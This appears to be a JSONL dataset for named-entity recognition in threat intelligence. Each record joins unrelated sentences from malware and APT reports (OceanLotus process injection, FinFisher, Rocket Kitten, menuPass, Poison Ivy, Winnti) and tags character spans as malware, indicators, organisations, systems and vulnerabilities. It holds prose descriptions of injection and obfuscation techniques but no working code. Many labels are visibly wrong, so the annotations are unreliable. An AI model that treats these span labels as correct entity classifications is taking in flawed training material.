{"text": "It opens the service thread of the service process and uses the ZwQueueApcThread native API to inject an APC . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . In addition to Denes and Remy backdoors , at least two different communication modules were observed with different versions of this launcher \u2013 DNSProvider and HTTPProv . The ThreatConnect Platform also offers workflows and lowcode automation to automate the analysis and response process of reported emails .", "spans": [{"start": 64, "end": 80, "label": "Indicator"}, {"start": 122, "end": 135, "label": "Organization"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 180, "end": 193, "label": "Organization"}, {"start": 199, "end": 210, "label": "Organization"}, {"start": 265, "end": 275, "label": "Organization"}, {"start": 358, "end": 363, "label": "Malware"}, {"start": 368, "end": 382, "label": "Malware"}, {"start": 487, "end": 498, "label": "System"}, {"start": 503, "end": 511, "label": "System"}, {"start": 518, "end": 540, "label": "System"}]}
{"text": "The APC routine creates a thread in the context of the svchost.exe process that will map and execute the stage 5 malware into the winlogon.exe process . The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The launcher binary , which contains the final backdoor , is RC4 encrypted and wrapped in a layer of obfuscated shellcode . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 55, "end": 66, "label": "Indicator"}, {"start": 130, "end": 142, "label": "Indicator"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 211, "end": 219, "label": "Organization"}, {"start": 224, "end": 240, "label": "Organization"}]}
{"text": "The injection method used for winlogon.exe is also interesting and quite unusual . ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) . We can see the familiar DOS stub in plain text , but the rest of the header and binary body are encrypted . We have been documenting it recently and are reporting the abuse to Cloudflare which it uses to hide its real infrastructure .", "spans": [{"start": 30, "end": 42, "label": "Indicator"}, {"start": 83, "end": 91, "label": "Organization"}, {"start": 190, "end": 196, "label": "System"}, {"start": 483, "end": 493, "label": "System"}]}
{"text": "We believe that this method is engineered to avoid trivial detection of process injection using the well-detected CreateRemoteThread or ZwQueueApcThread API . The Rocket Kitten attacker group 's main attack vector is spear-phishing . The shellcode is obfuscated using OceanLotus \u2019s standard approach of flattening the control flow and inserting junk opcodes ( as described in the ESET white paper on OceanLotus ) . For example , analysts need to consider during analysis whether the appliance is recording the true client IP addresses ( opposed to network address translation [ NAT ] addresses ) , and what normal user behavior looks like ( do users shift IP addresses frequently ) .", "spans": [{"start": 114, "end": 132, "label": "Indicator"}, {"start": 136, "end": 152, "label": "Indicator"}, {"start": 163, "end": 176, "label": "Organization"}, {"start": 177, "end": 191, "label": "Organization"}, {"start": 268, "end": 278, "label": "Organization"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 400, "end": 410, "label": "Organization"}]}
{"text": "The malware takes these steps : Check if the system master boot record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll ) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation . The shellcode starts in a fairly standard way \u2013 by walking the list of loaded modules in order to find the base of kernel32.dll library . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": [{"start": 110, "end": 124, "label": "Indicator"}, {"start": 368, "end": 379, "label": "Indicator"}, {"start": 387, "end": 399, "label": "Indicator"}, {"start": 413, "end": 423, "label": "Indicator"}, {"start": 452, "end": 471, "label": "Indicator"}, {"start": 525, "end": 544, "label": "Organization"}, {"start": 569, "end": 580, "label": "Organization"}, {"start": 753, "end": 765, "label": "Indicator"}, {"start": 824, "end": 840, "label": "Vulnerability"}]}
{"text": "pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes . Once kernel32 base is found , the shellcode will calculate the addresses of LoadLibraryA and GetProcAddress functions , and use them to resolve other necessary APIs , which include VirtualAlloc , RtlMoveMemory , and RtlZeroMemory . Further analyses of these similarities are available via Mandiant Advantage .", "spans": [{"start": 166, "end": 176, "label": "Indicator"}, {"start": 251, "end": 264, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 329, "end": 337, "label": "System"}, {"start": 400, "end": 412, "label": "System"}, {"start": 417, "end": 431, "label": "System"}, {"start": 484, "end": 488, "label": "System"}, {"start": 505, "end": 517, "label": "System"}, {"start": 520, "end": 533, "label": "System"}, {"start": 540, "end": 553, "label": "System"}, {"start": 613, "end": 631, "label": "Organization"}]}
{"text": ") Calculate the difference between this pointer and the User32 base address . While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight . After resolving the APIs , the shellcode will decrypt the launcher binary and load it to the memory . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 106, "end": 117, "label": "Organization"}, {"start": 122, "end": 130, "label": "Organization"}, {"start": 139, "end": 150, "label": "Organization"}, {"start": 162, "end": 175, "label": "Organization"}, {"start": 408, "end": 412, "label": "System"}, {"start": 640, "end": 665, "label": "Organization"}]}
{"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) . MZ header , PE header , as well as each section and their header , are decrypted separately using RC4 algorithm and a hardcoded key . UNC2529 has also used weaponized Microsoft Excel documents as a first stage downloader .", "spans": [{"start": 26, "end": 38, "label": "Indicator"}, {"start": 69, "end": 81, "label": "Indicator"}, {"start": 378, "end": 390, "label": "Indicator"}, {"start": 500, "end": 519, "label": "Organization"}, {"start": 609, "end": 620, "label": "Organization"}, {"start": 625, "end": 633, "label": "Organization"}, {"start": 736, "end": 739, "label": "System"}, {"start": 772, "end": 779, "label": "Organization"}, {"start": 780, "end": 858, "label": "Malware"}]}
{"text": "similar triggers that are easily detectable . Magic Hound will often find simpler ways for effective compromise , such as creative phishing and simple custom malware . Once all sections are loaded , the relocations get fixed and the MZ/PE headers are zeroed out in memory . It is entirely possible that these threat actors will go as far as compromising close contacts of their targets .", "spans": [{"start": 309, "end": 322, "label": "Organization"}]}
{"text": "After execution it takes care of restoring the original KernelCallbackTable . We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten . The shellcode then proceeds to execute the payload DLL\u2019s entry point . It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": [{"start": 112, "end": 124, "label": "Organization"}, {"start": 206, "end": 221, "label": "Organization"}, {"start": 327, "end": 343, "label": "Indicator"}, {"start": 348, "end": 356, "label": "Indicator"}, {"start": 388, "end": 395, "label": "Organization"}]}
{"text": "Stage 5 : The final loader takes control The stage 5 malware is needed only to provide one more layer of obfuscation , through the VM , of the final malware payload and to set up a special Structured Exception Hander routine , which is inserted as Wow64PrepareForException in Ntdll . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . The Internal name of this DLL is a randomly looking CLSID and it only exports one function called DllEntry . When exploiting these flaws , the threat actor almost always deploys a tunneling tool , the most common of which are Fast Reverse Proxy Client FRPC and Plink .", "spans": [{"start": 496, "end": 509, "label": "Organization"}, {"start": 520, "end": 527, "label": "Organization"}, {"start": 532, "end": 544, "label": "Organization"}, {"start": 573, "end": 576, "label": "System"}, {"start": 599, "end": 604, "label": "System"}, {"start": 645, "end": 653, "label": "System"}, {"start": 678, "end": 683, "label": "Vulnerability"}, {"start": 690, "end": 702, "label": "Organization"}, {"start": 727, "end": 741, "label": "System"}, {"start": 773, "end": 803, "label": "System"}, {"start": 808, "end": 813, "label": "System"}]}
{"text": "This special exception handler is needed to manage some memory buffers protection and special exceptions that are used to provide more stealthy execution . A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri . Upon execution , the launcher will attempt to hook legitimate wininet.dll library by overwriting its entry point in memory with the address of a malicious routine . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": [{"start": 271, "end": 284, "label": "Organization"}, {"start": 288, "end": 301, "label": "Organization"}, {"start": 449, "end": 460, "label": "Indicator"}, {"start": 589, "end": 601, "label": "Organization"}, {"start": 619, "end": 656, "label": "Malware"}, {"start": 702, "end": 717, "label": "Malware"}, {"start": 733, "end": 751, "label": "System"}]}
{"text": "After the VM code has checked again the user environment , it proceeds to extract and execute the final un-obfuscated payload sample directly into winlogon.exe ( alternatively , into explorer.exe ) process . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities . If successful , every time the system loads wininet.dll , the entry point of the subsequently dropped backdoor DLL will be executed before the original wininet entry point . They have employed many unique capabilities , including gaining initial access through a software supply chain vulnerability .", "spans": [{"start": 147, "end": 159, "label": "Indicator"}, {"start": 183, "end": 195, "label": "Indicator"}, {"start": 208, "end": 215, "label": "Organization"}, {"start": 286, "end": 299, "label": "Organization"}, {"start": 322, "end": 336, "label": "Organization"}, {"start": 365, "end": 378, "label": "Organization"}, {"start": 482, "end": 493, "label": "Indicator"}, {"start": 549, "end": 552, "label": "System"}, {"start": 622, "end": 690, "label": "Organization"}, {"start": 701, "end": 736, "label": "Vulnerability"}]}
{"text": "After the payload is extracted , decrypted , and mapped in the process memory , the malware calls the new DLL entry point , and then the RunDll exported function . To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . There is no proper DLL injection routine \u2013 the payload is just decompressed to the memory as-is \u2013 so the malware needs to fix all the pointers in the decompressed code , which is done on a one-by-one basis using hardcoded values and offsets . The output is then executed using and the return value is checked to determine the functions return value , if it is 0 , return 0 if not , it will call twice", "spans": [{"start": 184, "end": 190, "label": "Organization"}, {"start": 193, "end": 205, "label": "Organization"}, {"start": 221, "end": 235, "label": "Organization"}, {"start": 247, "end": 257, "label": "Organization"}, {"start": 321, "end": 331, "label": "System"}, {"start": 334, "end": 345, "label": "System"}, {"start": 394, "end": 402, "label": "Organization"}, {"start": 413, "end": 425, "label": "Organization"}, {"start": 450, "end": 453, "label": "System"}, {"start": 688, "end": 810, "label": "Malware"}]}
{"text": "The latter implements the entire spyware program . Charming kitten regularly target international media outlets with Persian-language services . This part takes 90% of the whole launcher code and includes over 11 , 000 modifications . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 51, "end": 66, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 248, "end": 264, "label": "Vulnerability"}, {"start": 339, "end": 355, "label": "Vulnerability"}]}
{"text": "Stage 6 : The payload is a modular spyware framework for further analysis Our journey to deobfuscating FinFisher has allowed us to uncover the complex anti-analysis techniques used by this malware , as well as to use this intel to protect our customers , which is our top priority . It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report . The launcher then calls the backdoor DLL\u2019s entry point . Mandiant assesses that DPRK \u2019s", "spans": [{"start": 103, "end": 112, "label": "Malware"}, {"start": 362, "end": 379, "label": "System"}, {"start": 471, "end": 479, "label": "Organization"}]}
{"text": "Analysis of the additional spyware modules is future work . In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) . The routine that reads configuration from resources and decompresses the C2 communication library is then called by temporarily replacing the pointer to CComCriticalSection function with the pointer to that routine . Another detection opportunity identified by Mandiant was source IP addresses that access multiple user accounts in a short period of time recorded in the ns.log files or forwarded logs via syslog .", "spans": [{"start": 81, "end": 86, "label": "System"}, {"start": 91, "end": 101, "label": "System"}, {"start": 104, "end": 108, "label": "System"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 187, "end": 193, "label": "System"}, {"start": 203, "end": 261, "label": "Organization"}, {"start": 264, "end": 270, "label": "Organization"}, {"start": 348, "end": 350, "label": "System"}, {"start": 428, "end": 447, "label": "System"}, {"start": 556, "end": 687, "label": "Indicator"}]}
{"text": "It is evident that the ultimate goal of this program is to steal information . Wapack labs also observed a similar sample targeting Japan in November . Such an obfuscation method makes it difficult to spot it in the code . Additional protections with context to your specific environment and threat data are available from the Firewall Management Center .", "spans": [{"start": 79, "end": 85, "label": "Organization"}]}
{"text": "The malware architecture is modular , which means that it can execute plugins . MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House . The launcher loads configuration from resources and uses an export from the backdoor DLL to initialize config values in memory . The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": [{"start": 80, "end": 88, "label": "Organization"}, {"start": 210, "end": 235, "label": "Organization"}, {"start": 244, "end": 255, "label": "Organization"}, {"start": 343, "end": 346, "label": "System"}]}
{"text": "The plugins are stored in its resource section and can be protected by the same VM . menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns . Resource P1/1 contains config values , including port number and a registry path . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": [{"start": 126, "end": 159, "label": "System"}, {"start": 293, "end": 304, "label": "System"}, {"start": 323, "end": 329, "label": "Organization"}, {"start": 338, "end": 347, "label": "Indicator"}, {"start": 350, "end": 361, "label": "Indicator"}, {"start": 366, "end": 374, "label": "Indicator"}]}
{"text": "The sample we analyzed in October , for example , contains a plugin that is able to spy on internet connections , and can even divert some SSL connections and steal data from encrypted traffic . There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) . After the content of resource 0xC8 is decompressed , another function from the backdoor DLL is used to load the C2 communication module to the memory and call its \" CreateInstance \" export . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": [{"start": 262, "end": 270, "label": "Organization"}, {"start": 287, "end": 298, "label": "Organization"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 401, "end": 404, "label": "System"}, {"start": 425, "end": 427, "label": "System"}, {"start": 478, "end": 492, "label": "System"}]}
{"text": "Some FinFisher variants incorporate an MBR rootkit , the exact purpose of which is not clear . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them . Finally , the launcher passes control to the main backdoor routine . Iranian APT group Siamesekitten PDF was identified as responsible for a supply chain attack campaign that targeted IT and communication companies in Israel .", "spans": [{"start": 5, "end": 14, "label": "Malware"}, {"start": 39, "end": 50, "label": "Indicator"}, {"start": 108, "end": 115, "label": "Organization"}, {"start": 151, "end": 155, "label": "System"}, {"start": 260, "end": 277, "label": "Organization"}, {"start": 278, "end": 295, "label": "Organization"}, {"start": 332, "end": 360, "label": "Organization"}, {"start": 375, "end": 405, "label": "Organization"}]}
{"text": "Quite possibly , this routine targets older platforms like Windows 7 and machines not taking advantage of hardware protections like UEFI and SecureBoot , available on Windows 10 . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed . OceanLotus : 0 4 name is read from resource P1/0x64 . Symantecs Threat Hunter Team , part of Broadcom , has seen it used in a single attack by a ransomware affiliate that attempted to deploy LockBit on a targets network and then switched to 3AM when LockBit was blocked .", "spans": [{"start": 59, "end": 68, "label": "System"}, {"start": 167, "end": 177, "label": "System"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 312, "end": 331, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}, {"start": 433, "end": 461, "label": "Organization"}, {"start": 472, "end": 480, "label": "Organization"}, {"start": 524, "end": 544, "label": "Organization"}, {"start": 570, "end": 577, "label": "Malware"}, {"start": 620, "end": 623, "label": "Malware"}, {"start": 629, "end": 636, "label": "Malware"}]}
{"text": "Describing this additional piece of code in detail is outside the scope of this analysis and may require a new dedicated blog post . menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets . OceanLotus : {12C044FA-A4AB-433B-88A2-32C3451476CE} memory pointer 4 points to a function that spawns another copy of malicious process . Disrupting supply chains , destroying centrifuges and other attacks can be classified as WarDefense driven .", "spans": [{"start": 66, "end": 71, "label": "System"}, {"start": 394, "end": 404, "label": "Organization"}]}
{"text": "Defense against FinFisher Exposing as much of FinFisher \u2019 s riddles as possible during this painstaking analysis has allowed us to ensure our customers are protected against this advanced piece of malware . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy . OceanLotus : {9E3BD021-B5AD-49DEAE93-F178329EE0FE} C&C URLs varies content is read from resource P1/2 . Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": [{"start": 16, "end": 25, "label": "Malware"}, {"start": 46, "end": 55, "label": "Malware"}, {"start": 352, "end": 362, "label": "Organization"}, {"start": 503, "end": 508, "label": "Organization"}, {"start": 537, "end": 543, "label": "Organization"}, {"start": 579, "end": 583, "label": "Organization"}, {"start": 595, "end": 606, "label": "Organization"}]}
{"text": "Windows 10 S devices are naturally protected against FinFisher and other threats thanks to the strong code integrity policies that don \u2019 t allow unknown unsigned binaries to run ( thus stopping FinFisher \u2019 s PE installer ) or loaded ( blocking FinFisher \u2019 s DLL persistence ) . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future . OceanLotus : 0 config varies content is read from resource P1/1 . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware \u2013 a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 53, "end": 62, "label": "Malware"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 244, "end": 253, "label": "Malware"}, {"start": 401, "end": 411, "label": "Organization"}, {"start": 524, "end": 536, "label": "Organization"}, {"start": 546, "end": 552, "label": "Organization"}, {"start": 619, "end": 628, "label": "Organization"}, {"start": 743, "end": 801, "label": "Organization"}]}
{"text": "On Windows 10 , similar code integrity policies can be configured using Windows Defender Application Control . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . OceanLotus : {B578B063-93FB-4A5F-82B4-4E6C5EBD393B} ? 4 0 ( config+0x486 ) . The second path ( /Library / Fonts / ArialUnicode.ttf.md5.1 ) may be used to store logging information related to monitor activity that is described as follows .", "spans": [{"start": 3, "end": 13, "label": "System"}, {"start": 72, "end": 108, "label": "System"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 216, "end": 245, "label": "Malware"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 403, "end": 533, "label": "Malware"}]}
{"text": "Office 365 Advanced Threat Protection secures mailboxes from email campaigns that use zero-day exploits to deliver threats like FinFisher . PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries . OceanLotus : {5035383A-F7B0-424A-9C9A-CA667416BA6F} port number 4 0x1BB ( 443 ) ( config+0x46C ) . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 0, "end": 37, "label": "System"}, {"start": 86, "end": 103, "label": "Vulnerability"}, {"start": 128, "end": 137, "label": "Malware"}, {"start": 208, "end": 225, "label": "System"}, {"start": 286, "end": 296, "label": "Organization"}, {"start": 470, "end": 479, "label": "Organization"}]}
{"text": "Office 365 ATP blocks unsafe attachments , malicious links , and linked-to files using time-of-click protection . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com . OceanLotus : {68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} registry path varies SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} . Mandiant is investigating intrusions across multiple verticals , including legal and professional services , technology , and government organizations .", "spans": [{"start": 0, "end": 14, "label": "System"}, {"start": 114, "end": 124, "label": "System"}, {"start": 130, "end": 143, "label": "Malware"}, {"start": 241, "end": 251, "label": "Organization"}, {"start": 453, "end": 528, "label": "Organization"}]}
{"text": "Using intel from this research , we have made Office 365 ATP more resistant to FinFisher \u2019 s anti-sandbox checks . First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 . The backdoor DLL is stored in the .rdata section of the launcher , compressed with LZMA , and encrypted with RC4 . However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": [{"start": 46, "end": 60, "label": "System"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 214, "end": 217, "label": "System"}, {"start": 284, "end": 288, "label": "System"}, {"start": 310, "end": 313, "label": "System"}, {"start": 456, "end": 523, "label": "Vulnerability"}]}
{"text": "Generic detections , advanced behavioral analytics , and machine learning technologies in Windows Defender Advanced Threat Protection detect FinFisher \u2019 s malicious behavior throughout the attack kill chain and alert SecOps personnel . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . The binary is heavily obfuscated with overlapping blocks of garbage code enclosed in pushf/popf instructions . nbtscan.exe", "spans": [{"start": 90, "end": 133, "label": "System"}, {"start": 141, "end": 150, "label": "Malware"}, {"start": 236, "end": 246, "label": "System"}, {"start": 294, "end": 298, "label": "System"}, {"start": 311, "end": 322, "label": "Malware"}, {"start": 325, "end": 341, "label": "Malware"}, {"start": 344, "end": 359, "label": "Malware"}, {"start": 362, "end": 376, "label": "Malware"}, {"start": 379, "end": 400, "label": "Malware"}, {"start": 403, "end": 417, "label": "Malware"}, {"start": 424, "end": 440, "label": "Malware"}, {"start": 554, "end": 565, "label": "System"}]}
{"text": "Windows Defender ATP also integrates with the Windows protection stack so that protections from Windows Defender AV and Windows Defender Exploit Guard are reported in Windows Defender ATP portal , enabling SecOps personnel to centrally manage security , and as well as promptly investigate and respond to hostile activity in the network . APT40 was previously reported as TEMP.Periscope and TEMP.Jumper . The DllMain function replaces the pointer to GetModuleHandleA API with a pointer to hook routine that will return the base of the backdoor DLL when called with NULL as parameter ( instead of returing the handle to the launcher DLL ) . This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 46, "end": 53, "label": "System"}, {"start": 96, "end": 115, "label": "System"}, {"start": 120, "end": 150, "label": "System"}, {"start": 167, "end": 187, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 372, "end": 386, "label": "Organization"}, {"start": 391, "end": 402, "label": "Organization"}, {"start": 409, "end": 416, "label": "System"}, {"start": 450, "end": 470, "label": "System"}, {"start": 544, "end": 547, "label": "System"}, {"start": 632, "end": 635, "label": "System"}, {"start": 676, "end": 684, "label": "Organization"}, {"start": 695, "end": 720, "label": "Organization"}]}
{"text": "We hope that this writeup of our journey through all the multiple layers of protection , obfuscation , and anti-analysis techniques of FinFisher will be useful to other researchers studying this malware . They move laterally and escalate system privileges to extract sensitive information \u2014 whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . The backdoor also contains an export that loads the C2 communication module reflectively to the memory from resource passed as parameter and then calls its \" CreateInstance \" export . The availability of such builders allows novice actors to generate their own customized ransomware variants .", "spans": [{"start": 135, "end": 144, "label": "Malware"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 346, "end": 350, "label": "System"}, {"start": 534, "end": 536, "label": "System"}, {"start": 640, "end": 654, "label": "System"}, {"start": 666, "end": 699, "label": "Vulnerability"}]}
{"text": "We believe that an industry-wide collaboration and information-sharing is important in defending customers against this complex piece of malware . In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . While we are still in the process of analyzing this backdoor\u2019s full functionality , it seems to be similar to the Remy backdoor described in our previous whitepaper on OceanLotus malware . The group behind the Winnti malware ( which we will call the Winnti group for brevity ) sprung up as a band of traditional cyber crooks , comprising black hats whose technical skills were employed to perpetrate financial fraud .", "spans": [{"start": 202, "end": 206, "label": "System"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 228, "end": 231, "label": "System"}, {"start": 246, "end": 263, "label": "Organization"}, {"start": 436, "end": 449, "label": "Malware"}, {"start": 490, "end": 500, "label": "Organization"}, {"start": 532, "end": 546, "label": "Malware"}, {"start": 572, "end": 584, "label": "Organization"}, {"start": 622, "end": 646, "label": "Organization"}, {"start": 660, "end": 737, "label": "Organization"}]}
{"text": "TUESDAY , APRIL 9 , 2019 Gustuff banking botnet targets Australia EXECUTIVE SUMMARY Cisco Talos has uncovered a new Android-based campaign targeting Australian financial institutions . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . This DLL is stored in the launcher\u2019s resources and compressed with LZMA . Does your organization support the U.S. Military An example would be supply chain management or manufacturing of parts that could be used by the military WarDefense", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 84, "end": 95, "label": "Organization"}, {"start": 116, "end": 129, "label": "System"}, {"start": 185, "end": 189, "label": "System"}, {"start": 263, "end": 278, "label": "Organization"}, {"start": 281, "end": 300, "label": "Organization"}, {"start": 303, "end": 322, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 410, "end": 432, "label": "Vulnerability"}, {"start": 451, "end": 455, "label": "System"}, {"start": 471, "end": 474, "label": "System"}, {"start": 533, "end": 537, "label": "System"}, {"start": 609, "end": 632, "label": "Organization"}, {"start": 636, "end": 649, "label": "Organization"}, {"start": 685, "end": 704, "label": "Organization"}]}
{"text": "As the investigation progressed , Talos came to understand that this campaign was associated with the \" ChristinaMorrow '' text message spam scam previously spotted in Australia . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . It\u2019s also heavily obfuscated , but in a slightly different way than the backdoor . Commands to the remote system , and often the results of those commands , will be embedded within the protocol traffic between the client and server .", "spans": [{"start": 34, "end": 39, "label": "Organization"}, {"start": 196, "end": 200, "label": "System"}, {"start": 222, "end": 238, "label": "Vulnerability"}]}
{"text": "Although this malware 's credential-harvest mechanism is not particularly sophisticated , it does have an advanced self-preservation mechanism . The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . Although it doesn\u2019t contain an internal name , we believe it\u2019s a variant of HttpProv library , as described in the ESET white paper on OceanLotus . We also found a live service selling VPS hosting at secure[.]66[.]to .", "spans": [{"start": 149, "end": 159, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 192, "end": 233, "label": "Malware"}, {"start": 423, "end": 439, "label": "System"}, {"start": 462, "end": 466, "label": "Organization"}, {"start": 482, "end": 492, "label": "Organization"}, {"start": 547, "end": 563, "label": "Indicator"}]}
{"text": "Even though this is not a traditional remote access tool ( RAT ) , this campaign seems to target mainly private users . Attackers can point and click their way through a compromised network and exfiltrate data . This module is used by the backdoor during HTTP/HTTPS communication with the C2 server and has a proxy bypass functionality . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 120, "end": 129, "label": "Organization"}, {"start": 289, "end": 291, "label": "System"}, {"start": 353, "end": 366, "label": "Vulnerability"}]}
{"text": "Aside from the credential stealing , this malware also includes features like the theft of users ' contact list , collecting phone numbers associated names , and files and photos on the device . Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time\u2014attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware . OceanLotus : ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Loader #1 . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": [{"start": 205, "end": 209, "label": "System"}, {"start": 275, "end": 287, "label": "Organization"}, {"start": 377, "end": 401, "label": "System"}, {"start": 404, "end": 414, "label": "Organization"}, {"start": 417, "end": 481, "label": "Indicator"}, {"start": 496, "end": 521, "label": "System"}, {"start": 593, "end": 614, "label": "System"}]}
